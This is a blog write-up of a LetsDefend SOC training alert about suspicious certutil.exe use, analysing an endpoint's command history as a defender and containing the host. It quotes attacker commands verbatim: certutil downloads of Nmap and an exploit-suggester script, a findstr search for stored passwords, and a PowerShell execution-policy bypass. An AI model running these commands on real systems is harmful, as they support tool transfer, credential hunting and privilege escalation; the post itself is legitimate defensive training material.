LetsDefend-SOC163 — Suspicious Certutil.exe Usage

Domiziana Foti
4 min readJan 17, 2023

Certutil.exe is a command-line program intended by Microsoft used to dump and view certificate authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates, key pairs, and certificate chains.

So why can this command be considered suspicious?

Precisely because it is not dangerous in nature and can be easily employed by threat actors to camouflage their malicious activity.

LOLBins is the abbreviated term for Living Off the Land Binaries. Living Off the Land Binaries are binaries of a non-malicious nature, local to the operating system, which makes them prime targets for utilization and exploitation by cyber criminals. Attackers who’ve compromised the system use these LOLBins to avoid downloading additional tools and be able to evade detections.

The reason for triggering the alert is -f parameter with certutil.exe.

The use of the -f (force), -split and -urlcache parameters has been identified by security reseracher as a behavior that allows the attacker to download files from a remote destination.

We then turn to endpoint security and analyze the command history.

From the first analysis of the commands executed between 10:11 a.m. and 10:27 a.m., it is immediately apparent that the net user command is executed to identify all user accounts on the computer. Other commands are executed to detect the network configuration of the system and to detect running processes.

Two very interesting certutil.exe commands are executed between 11:06 and 11:07 am. First one:

certutil.exe -urlcache -split -f https://nmap.org/dist/nmap-7.92-setup.exe nmap.zip

This one is used to download Nmap to the device. Nmap is a free and open source utility for network discovery. The goal is then to download files into the device following the technique identified by the MITRE ATTACK as
ID: T1105 Ingress Tool Transfer || ID: TA0011 Tactic: Command and Control. The adversary is trying to communicate with compromised systems to control them.


certutil.exe -urlcache -split -f https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py check.py

The second command exploits the same technique as the previous command and is used to download Windows Exploit Suggestor from the Internet, which is used by hackers e to get privileged access to host systems.

Now let’s check whether effectively a connection has been established, as we can see there has been a connection:

Next we can read from the executed commands that a scan is performed with nmap to check if port 80 (HTTP) is open.

The next steps indicate that:

python is used to execute the downloaded program and a basic enumeration of the system is done via arp -a.

findstr /si pass *.txt | *.xml| *.ini is used to find passwords in the various possible formats.

C:/powershell.exe -nop -exec bypass is executed to allow powershell scripts to run without being blocked or warned.

As the next step in the analysis, we check whether the process was executed by the user or by malware:

The activities were done by a user and not by malware because going to check the processes we notice that explorer.exe is the parent process.

Once the analysis has been completed we put the examined machine into containment. (EricProd)